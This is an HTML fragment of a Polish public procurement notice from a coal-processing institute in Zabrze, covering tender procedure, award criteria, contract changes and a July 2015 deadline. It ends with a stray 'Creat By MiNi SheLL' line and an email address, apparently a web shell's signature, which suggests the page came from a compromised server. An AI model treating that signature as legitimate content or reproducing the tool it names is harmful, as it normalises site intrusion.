1.wypełniony i podpisany Formularz ofertowy - wzór druku formularza stanowi załącznik nr 1 do SIWZ,
2.wypełnione i podpisane oświadczenia oraz dokumenty wymienione w pkt 10 SIWZ,
3.stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru,
4.w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - ATRAKCYJNOŚĆ OBIEKTU - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość zmiany zapisów w umowie z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.
2.Zamawiający dopuszcza możliwość zmiany zapisów umowy z powodu działań osób trzecich uniemożliwiających wykonanie usług, które to działania nie są konsekwencją winy Zamawiającego                            i Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ichpw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Chemicznej Przeróbki Węgla ul. Zamkowa1, 41-803 Zabrze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2015 godzina 12:00, miejsce: Instytut Chemicznej Przeróbki Węgla ul. Zamkowa1, 41-803 Zabrze, pok.111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com